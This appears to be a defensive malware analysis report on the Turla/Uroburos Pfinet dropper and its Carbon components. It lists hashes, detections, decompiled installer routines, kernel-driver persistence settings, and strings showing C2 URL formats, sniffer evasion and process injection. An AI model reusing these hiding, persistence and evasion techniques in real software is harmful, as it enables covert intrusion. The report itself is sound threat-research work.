Overview
During the last weeks, various samples of Uroburos (also named Urob, Turla, Sengoku, Snark and Pfinet) were analyzed and reports have been published 1234, also analyses about a suspected predecessor, Agent.btz, are public 5. CIRCL analyzed an older version of Turla, known as a representative of the Pfinet malware family. The objective of this analysis is to gather additional Indicators of Compromise or behaviors in order to improve detection and to discover additional insights into the malware. This document is not considered a final release but a work-in-progress document.
Static Analysis
Sample A
Hashes:
| Type of Hash | Hash | 
|---|---|
| MD5 | 5b4a956c6ec246899b1d459838892493 | 
| SHA1 | 217b8fa45a24681551bd84b573795b5925b2573e | 
| SHA-256 | 93742b415f28f57c61e7ce7d55208f71d5c4880dc66616da52f3c274b20b43b0 | 
| ssdeep | 24576:D0MfCZaSyUS7YXz3aHUXXeJozanHZCfBvt9MSc99rdI+6cGHe:D02saHQXeManH81t9BONdI3VHe | 
VirusTotal results for sample A
| AV product | Result | 
|---|---|
| Bkav | W32.Clod24a.Trojan.ceee | 
| MicroWorld-eScan | Dropped:Backdoor.Generic.252173 | 
| nProtect | Dropped:Backdoor.Generic.252173 | 
| McAfee | Artemis!5B4A956C6EC2 | 
| K7AntiVirus | Riskware ( 10a2c0f80 ) | 
| K7GW | Trojan ( 00155adb1 ) | 
| NANO-Antivirus | Trojan.Win64.Agent.lsivh | 
| F-Prot | W32/MalwareS.IHA | 
| Symantec | Backdoor.Pfinet | 
| Norman | Suspicious_Gen3.DGZV | 
| TotalDefense | Win32/Pfinet.A | 
| TrendMicro-HouseCall | TROJ_GEN.R27E1AH | 
| Avast | Win32:Malware-gen | 
| ClamAV | Trojan.Agent-126457 | 
| Kaspersky | Trojan.Win32.Genome.hitb | 
| BitDefender | Dropped:Backdoor.Generic.252173 | 
| Agnitum | Trojan.Meredrop!A/hBhJu+uNc | 
| Ad-Aware | Dropped:Backdoor.Generic.252173 | 
| Sophos | Mal/Generic-S | 
| Comodo | TrojWare.Win32.Agent.czua | 
| F-Secure | Dropped:Backdoor.Generic.252173 | 
| DrWeb | Trojan.Siggen.27969 | 
| VIPRE | Trojan.Win32.Generic!BT | 
| AntiVir | TR/Agent.czua | 
| TrendMicro | TROJ_GEN.R27E1AH | 
| McAfee-GW-Edition | Artemis!5B4A956C6EC2 | 
| Emsisoft | Dropped:Backdoor.Generic.252173 (B) | 
| Microsoft | Backdoor:WinNT/Pfinet.B | 
| GData | Dropped:Backdoor.Generic.252173 | 
| Commtouch | W32/Risk.DWJW-7987 | 
| VBA32 | Trojan.Agent2 | 
| Baidu-International | Trojan.Win32.Genome.aR | 
| ESET-NOD32 | a variant of Win32/Turla.AC | 
| Ikarus | Trojan.Win32.Genome | 
| Fortinet | W32/Pfinet!tr | 
| AVG | Generic16.BBMD | 
| Panda | Trj/Hmir.F | 
Scanned: 2014-03-16 01:12:54 - 49 scans - 37 detections (75.0%)
File characteristics
Meta data
Size:    1052672 bytes
Type:    PE32 executable (GUI) Intel 80386, for MS Windows
Date:    0x4AC5A74C [Fri Oct  2 07:10:04 2009 UTC]
EP:      0x4021bb .text 0/5
CRC:     Claimed: 0x0, Actual: 0x110f40 [SUSPICIOUS]
Resource entries
Name      RVA      Size     Lang         Sublang             Type
--------------------------------------------------------------------------------
BINARY    0xd190   0x3dc00  LANG_ENGLISH SUBLANG_ENGLISH_US  PE32 executable (DLL) (native) Intel 80386, for MS Windows
BINARY    0x4ad90  0x1d000  LANG_ENGLISH SUBLANG_ENGLISH_US  PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
BINARY    0x67d90  0x21000  LANG_ENGLISH SUBLANG_ENGLISH_US  PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
BINARY    0x88d90  0x1f9    LANG_ENGLISH SUBLANG_ENGLISH_US  ASCII text, with CRLF, LF line terminators
BINARY    0x88f90  0x37c00  LANG_ENGLISH SUBLANG_ENGLISH_US  PE32+ executable (DLL) (native) x86-64, for MS Windows
BINARY    0xc0b90  0x1bc00  LANG_ENGLISH SUBLANG_ENGLISH_US  PE32+ executable (DLL) (GUI) x86-64, for MS Windows
BINARY    0xdc790  0x24200  LANG_ENGLISH SUBLANG_ENGLISH_US  PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Version info
No version information included.
Sections
Name       VirtAddr     VirtSize     RawSize      Entropy
--------------------------------------------------------------------------------
.text      0x1000       0x6f34       0x7000       6.582374
.rdata     0x8000       0x1fb8       0x2000       4.803196
.data      0xa000       0x26f4       0x1000       1.559595
.rsrc      0xd000       0xf3990      0xf4000      5.977919
.reloc     0x101000     0x188c       0x2000       2.462180
SECTION 1 (.text   ):
		virtual size                  : 00006F34 (  28468.)
		virtual address               : 00001000
		section size                  : 00007000 (  28672.)
		offset to raw data for section: 00001000
		offset to relocation          : 00000000
		offset to line numbers        : 00000000
		number of relocation entries  : 0
		number of line number entries : 0
		alignment                     : 0 byte(s)
		Flags 60000020:
		  text only
		  Executable
		  Readable
SECTION 2 (.rdata  ):
		virtual size                  : 00001FB8 (   8120.)
		virtual address               : 00008000
		section size                  : 00002000 (   8192.)
		offset to raw data for section: 00008000
		offset to relocation          : 00000000
		offset to line numbers        : 00000000
		number of relocation entries  : 0
		number of line number entries : 0
		alignment                     : 0 byte(s)
		Flags 40000040:
		  data only
		  Readable
SECTION 3 (.data   ):
		virtual size                  : 000026F4 (   9972.)
		virtual address               : 0000A000
		section size                  : 00001000 (   4096.)
		offset to raw data for section: 0000A000
		offset to relocation          : 00000000
		offset to line numbers        : 00000000
		number of relocation entries  : 0
		number of line number entries : 0
		alignment                     : 0 byte(s)
		Flags C0000040:
		  data only
		  Readable
		  Writable
SECTION 4 (.rsrc   ):
		virtual size                  : 000F3990 ( 997776.)
		virtual address               : 0000D000
		section size                  : 000F4000 ( 999424.)
		offset to raw data for section: 0000B000
		offset to relocation          : 00000000
		offset to line numbers        : 00000000
		number of relocation entries  : 0
		number of line number entries : 0
		alignment                     : 0 byte(s)
		Flags 40000040:
		  data only
		  Readable
SECTION 5 (.reloc  ):
		virtual size                  : 0000188C (   6284.)
		virtual address               : 00101000
		section size                  : 00002000 (   8192.)
		offset to raw data for section: 000FF000
		offset to relocation          : 00000000
		offset to line numbers        : 00000000
		number of relocation entries  : 0
		number of line number entries : 0
		alignment                     : 0 byte(s)
		Flags 42000040:
		  data only
		  Discardable
		  Readable
Strings
The order of strings embedded in clear text in Sample A indicate that this file contains several other files, because the DOS stub (!This program cannot be run in DOS mode.) is present multiple times. We include interesting strings in the corresponding subsection.
Analysis - Installer
Sample A can be considered an installer or dropper. It drops files into the system and initializes the environment for production. First, it probes if a virtual disk
\DEVICE\IdeDrive1\
is present on the system. If not, the virtual disk is being created with file system NTFS, using FormatEx from Microsofts fmifs.dll.
1int __cdecl create_virtual_disk() 2{ 3 HMODULE hModule_fmifs.dll; 4 int result; 5 FARPROC FormatEx; 6 WCHAR VirtualDisk; 7 8 result = 0; 9 hModule_fmifs.dll = LoadLibraryA("fmifs.dll"); 10 if ( hModule_fmifs.dll ) 11 { 12 FormatEx = GetProcAddress(hModule_fmifs.dll, "FormatEx"); 13 if ( FormatEx ) 14 { 15 wsprintfW(&VirtualDisk, L"%S", "\\\\.\\IdeDrive1\\\\"); 16 (FormatEx)(&VirtualDisk, FMIFS_HARDDISK, L"NTFS", &gVirtualDiskName, 1, 0, FormatExCallback); 17 result = gFormatExCallbackActionInfo != 0; 18 } 19 FreeLibrary(hModule_fmifs.dll); 20 } 21 else 22 { 23 result = 0; 24 } 25 return result; 26}
The presence of the malware’s configuration file is tested:
\DEVICE\IdeDrive1\config.txt
If not found, it is dropped from the resource section 0x88d90.
The following files are dropped depending on whether Windows is running in 32 bit or 64 bit.
%SystemRoot%\$NtUninstallQ722833$\usbdev.sys (hidden)
\DEVICE\IdeDrive1\inetpub.dll
\DEVICE\IdeDrive1\cryptoapi.dll
Independently from the architecture, the file names of the dropped files are the same, but a specific version of the file is dropped according to the operating system architecture.
This is achieved by a logic similar to the following one. This is done for all files except the configuration file.
The function create_from_resources() looks like:
1int __cdecl create_from_resources(LPCSTR NameOfResource, LPCSTR lpSrc) 2{ 3 HRSRC HRSRC; 4 HGLOBAL hGlobal; 5 DWORD SizeOfResource; 6 HANDLE hFile; 7 DWORD error; 8 CHAR lpFileName; 9 char pSecurityDescriptor; 10 DWORD NumberOfBytesWritten; 11 LPCVOID lpBuffer; 12 13 ExpandEnvironmentStringsA(lpSrc, &lpFileName, 0x104u); 14 HRSRC = FindResourceA(0, NameOfResource, "BINARY"); 15 if ( !HRSRC ) 16 return 0; 17 hGlobal = LoadResource(0, HRSRC); 18 if ( !hGlobal ) 19 return 0; 20 lpBuffer = LockResource(hGlobal); 21 if ( !lpBuffer ) 22 return 0; 23 SizeOfResource = SizeofResource(0, HRSRC); 24 hFile = CreateFileA(&lpFileName, GENERIC_WRITE, 0, 0, 2u, 0x80u, 0); 25 if ( hFile == -1 ) 26 { 27 if ( last_error ) 28 { 29 error = GetLastError(); 30 log(last_error, "ex_fail... %d\n", error); 31 } 32 return 0; 33 } 34 WriteFile(hFile, lpBuffer, SizeOfResource, &NumberOfBytesWritten, 0); 35 CloseHandle(hFile); 36 if ( !InitializeSecurityDescriptor(&pSecurityDescriptor, 1u) ) 37 return 0; 38 return SetFileSecurityA(&lpFileName, DACL_SECURITY_INFORMATION, &pSecurityDescriptor) != 0; 39}
Subsequently, after dropping the correct files, the malware makes itself persistent on the system and creates a service with the following parameters, which loads the file usbdev.sys as a kernel driver:
In:           HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services:
Key:          usblink
Type:         1 (SERVICE_KERNEL_DRIVER)
Start: 		  1 (SERVICE_SYSTEM_START)
ErrorControl: 0 (SERVICE_ERROR_IGNORE)
Group:        Streams Drivers
DisplayName:  usblink
ImagePath:    \SystemRoot\$NtUninstallQ722833$\usbdev.sys
If during installation anything goes wrong, the registry keys are deleted. The files however are not.
During the installation process, extensive logging is ensuring good visibility on potential installation problems. The attacker uses english language for the logging, although he is lacking attention to detail when it comes to correct usage of the language, as the following examples demonstrate:
win32 detect...			(should be simple past)
x64 detect...			(should be simple past)
CretaFileA(%s): 		(should be CreateFileA)
Can`t open SERVICES key (that shouldn't be a backtick)
Language deficits are also demonstrated in other files of this collection. We show them in a separate chapter.
A list of dropped files is given in the next chapter.
Dropped files
Sample B - usbdev.sys (Resource: 101)
Hashes
| Type of Hash | Hash | 
|---|---|
| MD5 | db93128bff2912a75b39ee117796cdc6 | 
| SHA1 | 418645c09002845a8554095b355f47907f762797 | 
| SHA-256 | 57b8c2f5cfeaca97da58cfcdaf10c88dbc2c987c436ddc1ad7b7ed31879cb665 | 
| ssdeep | 3072:3B9f3bhj+FqCjAsWnQNCb/XzeQdRSFqfCeEmI/2XxjptNdjxjkMAE4E:3B9tQHWLrFfCZmI/MttB+E4 | 
VirusTotal results for sample B
| AV product | Result | 
|---|---|
| Bkav | W32.Cloda11.Trojan.222a | 
| MicroWorld-eScan | Backdoor.Generic.252173 | 
| nProtect | Trojan/W32.Agent2.252928 | 
| McAfee | Artemis!DB93128BFF29 | 
| K7GW | Trojan ( 0001140e1 ) | 
| K7AntiVirus | Riskware ( 10a2c0f80 ) | 
| Agnitum | Trojan.Agent2!HMPS2EOZWFE | 
| F-Prot | W32/MalwareS.IHA | 
| Symantec | Backdoor.Pfinet | 
| Norman | Suspicious_Gen3.DGZV | 
| TrendMicro-HouseCall | TROJ_GEN.R27E1AH | 
| Avast | Win32:Malware-gen | 
| Kaspersky | Trojan.Win32.Agent2.flce | 
| BitDefender | Backdoor.Generic.252173 | 
| Ad-Aware | Backdoor.Generic.252173 | 
| Sophos | Mal/Generic-S | 
| F-Secure | Backdoor.Generic.252173 | 
| DrWeb | Trojan.Siggen1.51234 | 
| VIPRE | Trojan.Win32.Generic!BT | 
| AntiVir | TR/Rootkit.Gen | 
| TrendMicro | TROJ_GEN.R27E1AH | 
| McAfee-GW-Edition | Artemis!DB93128BFF29 | 
| Emsisoft | Backdoor.Generic.252173 (B) | 
| Jiangmin | Trojan/Agent.djjf | 
| Antiy-AVL | Trojan/Win32.Agent2 | 
| Kingsoft | Win32.Troj.Agent2.(kcloud) | 
| Microsoft | Backdoor:WinNT/Pfinet.B | 
| GData | Backdoor.Generic.252173 | 
| Commtouch | W32/Risk.DWJW-7987 | 
| VBA32 | Trojan.Agent2 | 
| Panda | Rootkit/Agent.IOO | 
| ESET-NOD32 | a variant of Win32/Turla.AC | 
| Ikarus | Trojan.Win32.Agent | 
| Fortinet | W32/Agent2.LDY!tr | 
| AVG | Agent2.AHWF | 
| Baidu-International | Trojan.Win32.Agent.AFZ | 
Scanned: 2014-03-23 21:28:41 - 51 scans - 36 detections (70.0%)
File characteristics
Meta data
Size:    252928 bytes
Type:    PE32 executable (DLL) (native) Intel 80386, for MS Windows
Date:    0x4AC48FC8 [Thu Oct  1 11:17:28 2009 UTC]
EP:      0x22d80 .text 0/5
CRC:     Claimed: 0x3e7fe, Actual: 0x3e7fe
Sections
Name       VirtAddr     VirtSize     RawSize      Entropy
--------------------------------------------------------------------------------
.text      0x1000       0x28084      0x28200      6.325480
.basein    0x2a000      0x135        0x200        3.791369
.data      0x2b000      0x20e34      0x12600      1.335577
INIT       0x4c000      0xebc        0x1000       5.343628
.reloc     0x4d000      0x1de0       0x1e00       6.448244
Strings
Interesting strings:
CsrClientCallServer
ExitThread
LdrGetProcedureAddress
ZwTerminateThread
\SystemRoot\system32\%s
IoCreateDevice
ModuleStart
ModuleStop
\??\%s\cryptoapi.dll
\??\%s\inetpub.dll
services.exe
iexplore.exe
firefox.exe
opera.exe
netscape.exe
mozilla.exe
msimn.exe
outlook.exe
adobeupdater.exe
Sample C - inetpub.dll (Resource: 102)
Hashes
| Type of Hash | Hash | 
|---|---|
| MD5 | 2145945b9b32b4ccbd498db50419b39b | 
| SHA1 | 690f18810b0cbef06f7b864c7585bd6ed0d207e0 | 
| SHA-256 | 3de0ba77fa2d8b26e4226fd28edc3ab8448434d851f6b2b268ec072c5da92ade | 
| ssdeep | 3072:HPHvQByUS7Yqy7UKJm1Y3a3v/z61dmh9f3b/LAaulNA7:HPHqyUS7YqyIKH3aHz61Mh9jZulNC | 
VirusTotal results for sample C
| AV product | Result | 
|---|---|
| McAfee | Generic.dx!wel | 
| K7AntiVirus | Riskware | 
| Symantec | Backdoor.Pfinet | 
| Norman | W32/Suspicious_Gen3.UANR | 
| Avast | Win32:Malware-gen | 
| eSafe | Win32.TRATRAPS | 
| BitDefender | Backdoor.Generic.429659 | 
| F-Secure | Backdoor.Generic.429659 | 
| VIPRE | Trojan.Win32.Generic!BT | 
| AntiVir | TR/ATRAPS.Gen | 
| McAfee-GW-Edition | Generic.dx!wel | 
| Emsisoft | Backdoor.SuspectCRC!IK | 
| Antiy-AVL | Trojan/win32.agent.gen | 
| GData | Backdoor.Generic.429659 | 
| AhnLab-V3 | Backdoor/Win32.Pfinet | 
| PCTools | Backdoor.Pfinet | 
| Ikarus | Backdoor.SuspectCRC | 
| Panda | Trj/CI.A | 
| Avast5 | Win32:Malware-gen | 
Scanned: 2011-07-07 04:43:10 - 43 scans - 19 detections (44.0%)
File characteristics
Meta data
Size:    118784 bytes
Type:    PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Date:    0x4AC5A6A4 [Fri Oct  2 07:07:16 2009 UTC]
EP:      0x20013857 .text 0/5
CRC:     Claimed: 0x0, Actual: 0x2cb10 [SUSPICIOUS]
Sections
Name       VirtAddr     VirtSize     RawSize      Entropy
--------------------------------------------------------------------------------
.text      0x1000       0x12976      0x13000      6.509133
.basein    0x14000      0x97         0x1000       0.418760    [SUSPICIOUS]
.rdata     0x15000      0x4ede       0x5000       7.011329    [SUSPICIOUS]
.data      0x1a000      0x15f0       0x1000       5.453684
.reloc     0x1c000      0x152a       0x2000       4.423836
Exports
Flags         : 00000000
Time stamp    : Fri Oct  2 09:07:16 2009
Version       : 0.0
DLL name      : CARBON.dll
Ordinals base : 1. (00000001)
# of Addresses: 2. (00000002)
# of Names    : 2. (00000002)
  1. 00002CB9 ModuleStart
  2. 0000266C ModuleStop
Strings
\\.\IdeDrive1\\config.txt
ReceiveTimeout
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
NAME
object_id
VERSION
User
Carbon v3.51
OPER|Wrong config: bad address|
Mozilla/4.0 (compatible; MSIE 6.0)
OPER|Wrong config: no port|
OPER|Wrong config: empty address|
address
CW_INET
quantity
user_winmax
user_winmin
ST|Carbon v3.51|
\\.\IdeDrive1\\log.txt
Global\MSMMC.StartupEnvironment.PPT
Global\411A5195CD73A8a710E4BB16842FA42C
Global\881F0621AC59C4c035A5DC92158AB85E
Global\MSCTF.Shared.MUTEX.RPM
Global\WindowsShellHWDetection
Global\MSDBG.Global.MUTEX.ATF
TR|%d|
$Id: hide_module_win32.c 10189 2008-11-25 14:25:41Z gilg $
ZwWow64ReadVirtualMemory64
$Id: load_lib_win32.c 10180 2008-11-20 12:13:01Z gilg $
\SysWOW64\
\System32\
CreateRemoteThread
ZwTerminateThread
LdrGetProcedureAddress
ExitThread
$Id: mutex.c 3940 2006-03-20 16:47:16Z vlad $
$Id: rw_lock.c 4482 2006-08-30 13:07:14Z vlad $
%x-%x-%x-%x
%02d/%02d/%02d|%02d:%02d:%02d|%s|u|
search.google.com
www.easports.com
www.sun.com
www.dell.com
www.3com.com
www.altavista.com
www.hp.com
search.microsoft.com
windowsupdate.microsoft.com
www.microsoft.com
www.asus.com
www.eagames.com
www.google.com
www.astalavista.com
www.bbc.com
www.yahoo.com
CreateToolhelp32Snapshot() failed: %d
OPER|Sniffer '%s' running... ooopppsss...|
snoop.exe
ettercap.exe
wireshark.exe
ethereal.exe
windump.exe
tcpdump.exe
HTTP/1.1
%sauth.cgi?mode=query&id=%u:%u:%u:%u&serv=%s&lang=en&q=%u-%u&date=%s
%Y-%m-%d
%sdefault.asp?act=%u&id=%u&item=%u&event_id=%u&cln=%u&flt=%u&serv=%s&t=%ld&mode=query&lang=en&date=%s
lastconnect
timestop
.bak
\\.\IdeDrive1\\
D:AI
@OPER|Wrong timeout: high < low|
Mem alloc err
P|-1|%d|NULL|%d|
P|0|%s|%d|HC=%d
HC|%d|
P|-1|%d|%s|%d|
\\.\IdeDrive1\\Results\result.txt
POST
HTTP/1.0
A|-1|%u|%s|%s|
%u|%s|%s
Task %d failed %s,%d
\\.\IdeDrive1\\Results\
207.46.249.57
207.46.249.56
207.46.250.119
microsoft.com
207.46.253.125
207.46.18.94
update.microsoft.com
G|0|%d|%d|
%u|%s|%s|%s
OPER|Wrong config|
S|0|%s|
S|-1|%d|%s|
logperiod
lastsend
logmax
logmin
CopyFile(%s, %s):%d
CrPr(),WL(),AU() error: %d
CrPr() WaitForSingleObject() error: %d
CrPr() wait timeout %d msec exceeded: %d
T|-1|%d|%d|
Task not execute. Arg file failed.
WORKDATA
run_task
DELETE
COMPRESSION
RESULT
stdout
CONFIG
cmd.exe
time2task
m_recv() RESULT failed.
A|-1|%u|%s|%d|
active_con
m_send() TASK failed.
OBJECT ACK failed.
Internal task %d obj %s not equal robj %s... very strange!!!
m_recv() OBJECT failed.
m_send() OBJECT failed.
m_send() WHO failed.
AUTH failed.
m_recv() AUTH failed.
m_send() AUTH failed.
m_connect() failed.
m_setoptlist() failed.
net_password=
net_user=
allow=*everyone
write_peer_nfo=%c%s%c
frag_no_scrambling=1
frag_size=32768
m_create() failed.
frag.np
\\%s\pipe\comnode
W|2|%s|%d|
127.0.0.1
m_send() ZERO failed.
Trans task %d obj %s ACTIVE fail robj %s
net_password=%s
net_user=%s
\\%s\pipe\%s
frag.tcp
%s:%d
W|1|%s|%d|
%u|%s|%s|%s|%s|%d|%s|%s
\\.\IdeDrive1\\Tasks\task_system.txt
%u|%s|%s|%s|%s|%d
\\.\IdeDrive1\\Tasks\task.txt
%u|%s|%s|%s|%s
\\.\IdeDrive1\\Tasks\
W|0|%s|%d|
W|-1|%s|%d|
start
T|e|%d|
T|s|%d|
task_max
task_min
I|%d|
        reconstructing block ...
%6d unresolved strings
        depth %6d has
        bucket sorting ...
        %d pointers, %d sorted, %d scanned
        qsort [0x%x, 0x%x]   done %d   this %d
        main sort initialise ...
    too repetitive; using fallback sorting algorithm
      %d work, %d block, ratio %5.2f
CONFIG_ERROR
OUTBUFF_FULL
UNEXPECTED_EOF
IO_ERROR
DATA_ERROR_MAGIC
DATA_ERROR
MEM_ERROR
PARAM_ERROR
SEQUENCE_ERROR
codes %d
code lengths %d,
selectors %d,
      bytes: mapping %d,
      pass %d: size is %d, grp uses are
      initial group %d, [%d .. %d], has %d syms (%4.1f%%)
Y@      %d in block, %d after MTF & 1-2 coding, %d+2 syms in use
    final combined CRC = 0x%x
    block %d: crc = 0x%8x, combined CRC = 0x%8x, size = %d
$Id: b2_to_m2_stub.c 5273 2007-01-23 17:41:15Z vlad $
$Id: b_tcp.c 8474 2007-09-19 15:40:39Z vlad $
TCP: closed.
TCP: connecting...
Y1N0
nodelay
TCP: send
TCP: recv
%s:%u
nodelay=1
TCP: resolved %s
TCP: resolving host name...
$Id: l1_check.c 4477 2006-08-28 15:58:21Z vlad $
$Id: m2_to_b2_stub.c 4477 2006-08-28 15:58:21Z vlad $
$Id: m_frag.c 8715 2007-11-29 16:04:46Z urik $
peer_frag_size
frag_no_scrambling
frag_size
Frag: send
$Id: m_np.c 8825 2008-01-10 13:13:15Z vlad $
\\.\pipe\
no_server_hijack
imp_level
net_password
net_user
write_peer_nfo
read_peer_nfo
*everyone
allow
$Id: np_win32_common.c 4483 2006-08-30 13:13:51Z vlad $
anonymous
every1
\ipc$
\pipe\
$Id: t_byte1.c 5324 2007-01-30 12:45:35Z vlad $
frag
$Id: t_manager.c 8715 2007-11-29 16:04:46Z urik $
transports
$Id: t_message1.c 5290 2007-01-26 11:15:03Z vlad $
licence error
Sample D - cryptoapi.dll (Resource: 105)
Hashes
| Type of Hash | Hash | 
|---|---|
| MD5 | a67311ec502593630307a5f3c220dc59 | 
| SHA1 | 74b0c62737f43b0138cfae0d0972178a14fbea10 | 
| SHA-256 | 67bc775cc1a58930201ef247ace86cc5c8569057d4911a8e910ac2263c8eb880 | 
| ssdeep | 3072:/eZCuX04e/tmjQFFTNna3bFy99f3bay/FjIJA:/eZbUIj4zaLFw9/JI+ | 
VirusTotal results for sample D
| AV product | Result | 
|---|---|
| CAT-QuickHeal | Backdoor.Pfinet | 
| McAfee | Generic.dx!ueu | 
| K7AntiVirus | Riskware | 
| VirusBuster | Backdoor.Agent!JK8atQHb1PQ | 
| Symantec | Backdoor.Pfinet | 
| Norman | W32/Suspicious_Gen3.JVLR | 
| TrendMicro-HouseCall | TROJ_GEN.R47C3JS | 
| Avast | Win32:Malware-gen | 
| Kaspersky | UDS:DangerousObject.Multi.Generic | 
| BitDefender | Backdoor.Generic.264016 | 
| Emsisoft | Backdoor.SuspectCRC!IK | 
| Comodo | UnclassifiedMalware | 
| F-Secure | Backdoor.Generic.264016 | 
| VIPRE | Trojan.Win32.Generic!BT | 
| AntiVir | TR/ATRAPS.Gen | 
| TrendMicro | TROJ_GEN.R47C3JS | 
| McAfee-GW-Edition | Heuristic.BehavesLike.Win32.Suspicious.H | 
| GData | Backdoor.Generic.264016 | 
| AhnLab-V3 | Backdoor/Win32.Pfinet | 
| PCTools | Backdoor.Pfinet | 
| Ikarus | Backdoor.SuspectCRC | 
| Panda | Trj/CI.A | 
| Avast5 | Win32:Malware-gen | 
Scanned: 2011-05-08 11:16:36 - 42 scans - 23 detections (54.0%)
File characteristics
Meta data
Size:    135168 bytes
Type:    PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Date:    0x4AC5A662 [Fri Oct  2 07:06:10 2009 UTC]
EP:      0x20015d85 .text 0/5
CRC:     Claimed: 0x0, Actual: 0x2ccd6 [SUSPICIOUS]
Exports
Flags         : 00000000
Time stamp    : Fri Oct  2 09:06:07 2009
Version       : 0.0
DLL name      : carbon_system.dll
Ordinals base : 1. (00000001)
# of Addresses: 1. (00000001)
# of Names    : 1. (00000001)
  1. 00002655 ModuleStart
Sections
Name       VirtAddr     VirtSize     RawSize      Entropy
--------------------------------------------------------------------------------
.text      0x1000       0x150d5      0x16000      6.417399
.basein    0x17000      0x97         0x1000       0.418760    [SUSPICIOUS]
.rdata     0x18000      0x5380       0x6000       6.450645
.data      0x1e000      0x15e0       0x1000       5.450370
.reloc     0x20000      0x15e4       0x2000       4.991237
Strings
$Id: t_utils.c 5503 2007-02-26 13:14:30Z vlad $
$Id: t_status.c 5666 2007-03-19 16:18:00Z vlad $
$Id: t_message1.c 5290 2007-01-26 11:15:03Z vlad $
$Id: t_manager.c 8715 2007-11-29 16:04:46Z urik $
$Id: t_byte1.c 5324 2007-01-30 12:45:35Z vlad $
$Id: np_win32_common.c 4483 2006-08-30 13:13:51Z vlad $
$Id: m_np.c 8825 2008-01-10 13:13:15Z vlad $
$Id: m_frag.c 8715 2007-11-29 16:04:46Z urik $
$Id: m2_to_b2_stub.c 4477 2006-08-28 15:58:21Z vlad $
$Id: l1_check.c 4477 2006-08-28 15:58:21Z vlad $
$Id: b_tcp.c 8474 2007-09-19 15:40:39Z vlad $
$Id: b2_to_m2_stub.c 5273 2007-01-23 17:41:15Z vlad $
$Id: thread.c 4593 2006-10-12 11:43:29Z urik $
$Id: rw_lock.c 4482 2006-08-30 13:07:14Z vlad $
$Id: mutex.c 3940 2006-03-20 16:47:16Z vlad $
$Id: load_lib_win32.c 10180 2008-11-20 12:13:01Z gilg $
$Id: hide_module_win32.c 10189 2008-11-25 14:25:41Z gilg $
\\.\IdeDrive1\\Tasks\
\\.\IdeDrive1\\Results\
Global\MSDBG.Global.MUTEX.ATF
Global\WindowsShellHWDetection
Global\MSCTF.Shared.MUTEX.RPM
Global\881F0621AC59C4c035A5DC92158AB85E
Global\411A5195CD73A8a710E4BB16842FA42C
Global\MSMMC.StartupEnvironment.PPT
\\.\IdeDrive1\\log.txt
TR|%d|
SR|%d|
ST|Carbon v3.61|
\\.\IdeDrive1\\*.bak
\\.\IdeDrive1\\
\\.\IdeDrive1\\Tasks\task.txt
\\.\IdeDrive1\\Tasks\task_system.txt
\\.\IdeDrive1\\Tasks\*.tmp
\\.\IdeDrive1\\config.txt
sys_winmin
TIME
sys_winmax
\\.\IdeDrive1\\restrans.txt
quantity
CW_LOCAL
address
object
D:(A;OICIID;GRGWGX;;;WD)
Carbon v3.61
System
VERSION
object_id
NAME
CW_INET
logperiod
OPER|Survive me, i`m close to death... free space less than 5%%...|
OPER|Low space... free space less than 10%%...|
ZwWow64ReadVirtualMemory64
ExitThread
LdrGetProcedureAddress
ZwTerminateThread
CreateRemoteThread
\System32\
\SysWOW64\
OPER|Wrong timeout: high < low|
%02d/%02d/%02d|%02d:%02d:%02d|%s|s|
CreateToolhelp32Snapshot() failed: %d
tcpdump.exe
windump.exe
ethereal.exe
wireshark.exe
ettercap.exe
snoop.exe
OPER|Sniffer '%s' running... ooopppsss...|
%x-%x-%x-%x
run_task_system
WORKDATA
\\.\IdeDrive1\\Results\result.txt
I|%d|
task_min
task_max
T|s|%d|
%u|1|%s|%s
%u|2|%s|%s|%s
T|e|%d|
start
time2task
cmd.exe
CONFIG
stdout
RESULT
COMPRESSION
DELETE
%u|%s|%s
%u|%s|%s|%s
Task not execute. Arg file failed.
T|-1|%d|%d|
AS_USER:LogonUser():%d
AS_USER:DuplicateTokenEx():%d
explorer.exe
AS_CUR_USER:OpenProcessToken():%d
AS_CUR_USER:DuplicateTokenEx():%d
CrPr() wait timeout %d msec exceeded: %d
CrPr() WaitForSingleObject() error: %d
CrPr(),WL(),AU():%d
CopyFile(%s, %s):%d
Memory allocation error. Use no compression
frag.np
\\.\Global\PIPE\comnode
frag_size=32768
frag_no_scrambling=1
allow=*everyone
active_con
frag.tcp/%s:445
frag.np/%s
\\.\IdeDrive1\\logtrans.txt
A|2|%s|
W|%s|%s|
m_send() ZERO1 failed
W|%s|%s|%s|
\*.tmp
m_send() ZERO2 failed
R|%s|%d|
\\%s\pipe\comnode
frag.tcp
net_user=
net_password=
write_peer_nfo=%c%s%c
P|0|%s|%d|
P|-1|%d|%s|%d|
P|-1|%d|%d|
nodelay=N
W|-1|%d|%s|
SEND AUTH
W|-1|%d|%s|%s|
RECV AUTH
AUTH FAILED
SEND WHO
SEND OBJECT_ID
logmin
logmax
lastsend
S|0|%s|
S|-1|%d|%s|
Task %d failed %s, %d
A|-1|%u|%s|%s|
timestop
lastconnect
.bak
%u:%u:%u:%u:%u
Freeze Ok.
\$NtUninstallQ722833$\usbdev.sys
\\.\IdeDrive1\\usbdev.bak
\\.\IdeDrive1\\inetpub.bak
\\.\IdeDrive1\\inetpub.dll
\\.\IdeDrive1\\cryptoapi.bak
\\.\IdeDrive1\\cryptoapi.dll
Update Ok.
Update failed =((  Can`t create file.
\\.\IdeDrive1\\Plugins\
Can't create file '%s', error %d =((
Create plugin '%s' OK.
Create plugin '%s' failed. Write error, %d.
PLUGINS
Find existing record.
not_started|%d
Config update success.
enable%s
Config record error: %s = %s.
Plugin not found in config.
Plugin already loaded.
ModuleStart
can`t find entry point.
loadlibrary() failed.
Plugin start failed, %d
try to run dll with user priv.
can`t get characs.
Plugin not PE format.
Plugin start success.
Plugin start failed.
disable%s
removed%s
Plugin not loaded.
Plugin deleted.
Plugin delete failed, %d.
Plugin terminated.
Plugin terminate failed, %d.
ModuleStop
Plugin dll stop success.
Plugin dll stop failed.
Plugin freelib success.
Plugin freelib failed, %d.
Internal command not support =((
%u|1|%s
G|0|%d|%d|
W|0|%s|%d|
A|0|%s|%d|
%u|%s|%s|%s|%s
%u|%s|%s|%s|%s|%d|%s|%s
%u|%s|%s|%s|%s|%d
W|1|%s|%d|
A|1|%s|%d|
